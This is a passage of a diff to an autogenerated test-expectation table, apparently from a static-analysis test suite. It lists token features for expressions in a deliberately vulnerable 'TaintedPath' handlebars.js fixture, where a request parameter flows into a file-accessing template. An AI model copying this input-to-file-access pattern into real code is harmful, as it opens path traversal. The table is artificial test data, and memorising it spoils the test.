autogenerated/TaintedPath/handlebars.js:29:5:29:64 | exceptional return of res.sen ... ath })) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:5:29:64 | exceptional return of res.sen ... ath })) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:5:29:64 | res.sen ... ath })) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:5:29:64 | res.sen ... ath })) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:5:29:64 | res.sen ... ath })) | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:5:29:64 | res.sen ... ath })) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:5:29:64 | res.sen ... ath })) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:9:29:12 | send | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:9:29:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:9:29:12 | send | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:9:29:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:9:29:12 | send | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:14:29:17 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:14:29:17 | data | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:14:29:17 | data | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:14:29:17 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:14:29:17 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:14:29:36 | data.co ... eAccess | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:14:29:36 | data.co ... eAccess | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:14:29:36 | data.co ... eAccess | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:14:29:36 | data.co ... eAccess | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:14:29:36 | data.co ... eAccess | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:29:14:29:63 | data.co ... path }) | CalleeFlexibleAccessPath | res.send | | autogenerated/TaintedPath/handlebars.js:29:14:29:63 | data.co ... path }) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:29:14:29:63 | data.co ... path }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | @@ -7155,6 +68060,16 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:29:14:29:63 | data.co ... path }) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:29:14:29:63 | data.co ... path }) | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:29:14:29:63 | data.co ... path }) | receiverName | res | +| autogenerated/TaintedPath/handlebars.js:29:14:29:63 | exceptional return of data.co ... path }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:14:29:63 | exceptional return of data.co ... path }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:29:14:29:63 | exceptional return of data.co ... path }) | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:14:29:63 | exceptional return of data.co ... path }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:14:29:63 | exceptional return of data.co ... path }) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:19:29:36 | compiledFileAccess | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:19:29:36 | compiledFileAccess | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:19:29:36 | compiledFileAccess | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:19:29:36 | compiledFileAccess | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:19:29:36 | compiledFileAccess | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:29:38:29:62 | { path: ... .path } | CalleeFlexibleAccessPath | data.compiledFileAccess | | autogenerated/TaintedPath/handlebars.js:29:38:29:62 | { path: ... .path } | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:29:38:29:62 | { path: ... .path } | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | @@ -7163,6 +68078,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:29:38:29:62 | { path: ... .path } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:29:38:29:62 | { path: ... .path } | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:29:38:29:62 | { path: ... .path } | receiverName | data | +| autogenerated/TaintedPath/handlebars.js:29:40:29:43 | path | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:40:29:43 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:40:29:43 | path | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:40:29:43 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:40:29:43 | path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:40:29:60 | path: r ... ms.path | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:40:29:60 | path: r ... ms.path | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:40:29:60 | path: r ... ms.path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:29:40:29:60 | path: r ... ms.path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:29:40:29:60 | path: r ... ms.path | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:40:29:60 | path: r ... ms.path | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:40:29:60 | path: r ... ms.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:40:29:60 | path: r ... ms.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:40:29:60 | path: r ... ms.path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:40:29:60 | path: r ... ms.path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:46:29:48 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:46:29:48 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:46:29:48 | req | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:46:29:48 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:46:29:48 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:46:29:55 | req.params | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:46:29:55 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:46:29:55 | req.params | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:46:29:55 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:46:29:55 | req.params | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:29:46:29:60 | req.params.path | CalleeFlexibleAccessPath | data.compiledFileAccess | | autogenerated/TaintedPath/handlebars.js:29:46:29:60 | req.params.path | InputAccessPathFromCallee | 0.path | | autogenerated/TaintedPath/handlebars.js:29:46:29:60 | req.params.path | InputArgumentIndex | 0 | @@ -7172,6 +68112,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:29:46:29:60 | req.params.path | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | | autogenerated/TaintedPath/handlebars.js:29:46:29:60 | req.params.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:29:46:29:60 | req.params.path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:50:29:55 | params | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:50:29:55 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:50:29:55 | params | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:50:29:55 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:50:29:55 | params | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:57:29:60 | path | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:57:29:60 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:57:29:60 | path | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:57:29:60 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:57:29:60 | path | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:1:32:3 | app | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:1:32:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:1:32:3 | app | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:1:32:7 | app.get | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:1:32:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:1:32:7 | app.get | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:1:34:2 | app.get ... ile)\\n}) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:1:34:2 | app.get ... ile)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:1:34:2 | app.get ... ile)\\n}) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:1:34:2 | exceptional return of app.get ... ile)\\n}) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:1:34:2 | exceptional return of app.get ... ile)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:1:34:2 | exceptional return of app.get ... ile)\\n}) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:5:32:7 | get | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:5:32:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:5:32:7 | get | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:32:9:32:21 | '/some/path2' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/handlebars.js:32:9:32:21 | '/some/path2' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:32:9:32:21 | '/some/path2' | calleeImports | express | @@ -7179,6 +68144,26 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:32:9:32:21 | '/some/path2' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/handlebars.js:32:9:32:21 | '/some/path2' | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:32:9:32:21 | '/some/path2' | receiverName | app | +| autogenerated/TaintedPath/handlebars.js:32:24:32:23 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:24:32:23 | data | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:24:32:23 | data | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:32:24:32:23 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:32:24:32:23 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:24:32:23 | this | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:24:32:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:24:32:23 | this | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:32:24:32:23 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:32:24:32:23 | this | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | 'arguments' object of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | exceptional return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | exceptional return of anonymous function | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:32:24:34:1 | functio ... File)\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/handlebars.js:32:24:34:1 | functio ... File)\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/handlebars.js:32:24:34:1 | functio ... File)\\n} | calleeImports | express | @@ -7186,6 +68171,66 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:32:24:34:1 | functio ... File)\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/handlebars.js:32:24:34:1 | functio ... File)\\n} | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:32:24:34:1 | functio ... File)\\n} | receiverName | app | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | return of anonymous function | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:32:24:34:1 | return of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:34:32:36 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:34:32:36 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:34:32:36 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:34:32:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:32:34:32:36 | req | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:32:34:32:36 | req | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:32:34:32:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:32:34:32:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:32:34:32:36 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:34:32:36 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:39:32:41 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:39:32:41 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:32:39:32:41 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:32:39:32:41 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:32:39:32:41 | res | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:32:39:32:41 | res | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:32:39:32:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:32:39:32:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:32:39:32:41 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:32:39:32:41 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:5:33:7 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:5:33:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:5:33:7 | res | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:5:33:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:5:33:7 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:5:33:12 | res.send | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:5:33:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:5:33:12 | res.send | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:5:33:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:5:33:12 | res.send | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:5:33:60 | exceptional return of res.sen ... ame })) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:5:33:60 | exceptional return of res.sen ... ame })) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:33:5:33:60 | exceptional return of res.sen ... ame })) | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:5:33:60 | exceptional return of res.sen ... ame })) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:5:33:60 | exceptional return of res.sen ... ame })) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:5:33:60 | res.sen ... ame })) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:5:33:60 | res.sen ... ame })) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:5:33:60 | res.sen ... ame })) | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:5:33:60 | res.sen ... ame })) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:5:33:60 | res.sen ... ame })) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:9:33:12 | send | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:9:33:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:9:33:12 | send | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:9:33:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:9:33:12 | send | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:14:33:17 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:14:33:17 | data | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:14:33:17 | data | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:14:33:17 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:14:33:17 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:14:33:32 | data.compiledBenign | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:14:33:32 | data.compiledBenign | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:14:33:32 | data.compiledBenign | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:14:33:32 | data.compiledBenign | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:14:33:32 | data.compiledBenign | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:33:14:33:59 | data.co ... name }) | CalleeFlexibleAccessPath | res.send | | autogenerated/TaintedPath/handlebars.js:33:14:33:59 | data.co ... name }) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:33:14:33:59 | data.co ... name }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | @@ -7194,6 +68239,16 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:33:14:33:59 | data.co ... name }) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:33:14:33:59 | data.co ... name }) | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:33:14:33:59 | data.co ... name }) | receiverName | res | +| autogenerated/TaintedPath/handlebars.js:33:14:33:59 | exceptional return of data.co ... name }) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:14:33:59 | exceptional return of data.co ... name }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:33:14:33:59 | exceptional return of data.co ... name }) | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:14:33:59 | exceptional return of data.co ... name }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:14:33:59 | exceptional return of data.co ... name }) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:19:33:32 | compiledBenign | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:19:33:32 | compiledBenign | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:19:33:32 | compiledBenign | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:19:33:32 | compiledBenign | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:19:33:32 | compiledBenign | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:33:34:33:58 | { name: ... .name } | CalleeFlexibleAccessPath | data.compiledBenign | | autogenerated/TaintedPath/handlebars.js:33:34:33:58 | { name: ... .name } | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:33:34:33:58 | { name: ... .name } | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | @@ -7202,6 +68257,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:33:34:33:58 | { name: ... .name } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/handlebars.js:33:34:33:58 | { name: ... .name } | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:33:34:33:58 | { name: ... .name } | receiverName | data | +| autogenerated/TaintedPath/handlebars.js:33:36:33:39 | name | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:36:33:39 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:36:33:39 | name | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:36:33:39 | name | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:36:33:39 | name | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:36:33:56 | name: r ... ms.name | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:36:33:56 | name: r ... ms.name | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:36:33:56 | name: r ... ms.name | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:33:36:33:56 | name: r ... ms.name | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:33:36:33:56 | name: r ... ms.name | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:36:33:56 | name: r ... ms.name | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:36:33:56 | name: r ... ms.name | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:36:33:56 | name: r ... ms.name | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:36:33:56 | name: r ... ms.name | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:36:33:56 | name: r ... ms.name | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:42:33:44 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:42:33:44 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:42:33:44 | req | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:42:33:44 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:42:33:44 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:33:42:33:51 | req.params | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:33:42:33:51 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:33:42:33:51 | req.params | enclosingFunctionBody | req res res send data compiledBenign name req params name | +| autogenerated/TaintedPath/handlebars.js:33:42:33:51 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:33:42:33:51 | req.params | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:33:42:33:56 | req.params.name | CalleeFlexibleAccessPath | data.compiledBenign | | autogenerated/TaintedPath/handlebars.js:33:42:33:56 | req.params.name | InputAccessPathFromCallee | 0.name | | autogenerated/TaintedPath/handlebars.js:33:42:33:56 | req.params.name | InputArgumentIndex | 0 | @@ -7211,6 +68291,31 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:33:42:33:56 | req.params.name | enclosingFunctionBody | req res res send data compiledBenign name req params name | | autogenerated/TaintedPath/handlebars.js:33:42:33:56 | req.params.name | 